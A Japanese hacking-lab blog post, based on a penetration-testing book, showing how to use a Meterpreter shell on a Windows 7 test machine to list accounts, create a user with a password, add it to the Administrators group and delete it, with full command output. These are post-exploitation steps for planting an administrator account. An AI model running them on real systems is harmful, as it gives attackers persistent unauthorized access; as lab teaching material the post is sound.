Windows 7 のシェルを奪いユーザの追加及び削除を行う

Windows 7

今回は、ターゲット端末のユーザを追加/削除します。

ユーザの追加/削除はコマンドプロンプト上で行えるため、meterpreter プロンプトで 「shell」を実行し、その上で操作を行っていきます。

shell 実行までの流れは以下の記事で紹介しているため、そちらをご参照ください。

ユーザアカウントの表示

「net user」コマンドで現在存在するユーザを表示することが可能です。

C:\Windows\system32>net user
net user

User accounts for \\IE8WIN7

-------------------------------------------------------------------------------
Administrator Guest IEUser 
sshd sshd_server 
The command completed successfully.

C:\Windows\system32>

Administrator、Guest、IEUer、sshd、sshd_server の5つのアカウントが存在することが確認できました。

Windows 7側でコントロールパネルからユーザアカウントを確認するとIEUer、Guest、sshd_server の3つしか表示されませんが、 これはアカウントが無効になっていることが理由です。

アカウントの有効/無効は、同じく net user コマンドで確認が可能です。

[Administrator]

C:\Windows\system32>net user Administrator
net user Administrator
User name Administrator
Full Name 
Comment Built-in account for administering the computer/domain
User's comment 
Country code 000 (System Default)
Account active No
Account expires Never

[IEUser]

C:\Windows\system32>net user IEUser 
net user IEUser
User name IEUser
Full Name IEUser
Comment IEUser
User's comment 
Country code 001 (United States)
Account active Yes
Account expires Never

ユーザの追加

以下コマンドを実行することでユーザの追加が可能です。

net user <ユーザ名> /add

なお、以降の操作はSYSTEM権限が必要のため、SYSTEM権限に昇格させた状態で shell を起動させてください。SYSTEM権限への昇格手順は以下の記事に記載しています。

それでは実行します。

C:\Windows\system32>net user test /add
net user test /add
The command completed successfully.

C:\Windows\system32>

上記が出力されていればユーザの追加に成功しています。

実際に確認すると、testユーザが追加されています。

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator Guest IEUser 
sshd sshd_server test 
The command completed with one or more errors.

C:\Windows\system32>

パスワード設定

次にパスワードを設定します。以下のコマンドでパスワードを設定することが可能です。

net user <ユーザ名> <パスワード>

C:\Windows\system32>net user test test123
net user test test123
The command completed successfully.

C:\Windows\system32>

管理者権限の付与

次に管理者権限を付与します。

作成したユーザを管理者権限グループ(Administrators)に追加することで管理者権限が付与されます。

以下のコマンドで任意のグループにユーザを追加することができます。

net localgroup <グループ名> <ユーザ名> /add

C:\Windows\system32>net localgroup administrators test /add
net localgroup administrators test /add
The command completed successfully.

C:\Windows\system32>

net user で test ユーザの情報を確認すると、パスワードの設定及び Administratorsグループへの追加が行われていることがわかります。

C:\Windows\system32>net user test 
net user test
User name test
Full Name 
Comment 
User's comment 
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 3/6/2020 11:05:00 PM
Password expires 4/17/2020 11:05:00 PM
Password changeable 3/6/2020 11:05:00 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script 
User profile 
Home directory 
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators *Users 
Global Group memberships *None 
The command completed successfully.

C:\Windows\system32>

ユーザの削除

次に、上記で追加したユーザを削除します。以下のコマンドで削除することが可能です。

net user <ユーザ名> /delete

C:\Windows\system32>net user test /delete
net user test /delete
The command completed successfully.

C:\Windows\system32>

実際に削除されているか、確認します。

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator Guest IEUser 
sshd sshd_server 
The command completed with one or more errors.

C:\Windows\system32>

このように、test ユーザが削除されていることがわかります。

今回のようなコマンドプロンプト上で行える操作は、meterpreterで簡単に遠隔操作できますね。

今回は以上です。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました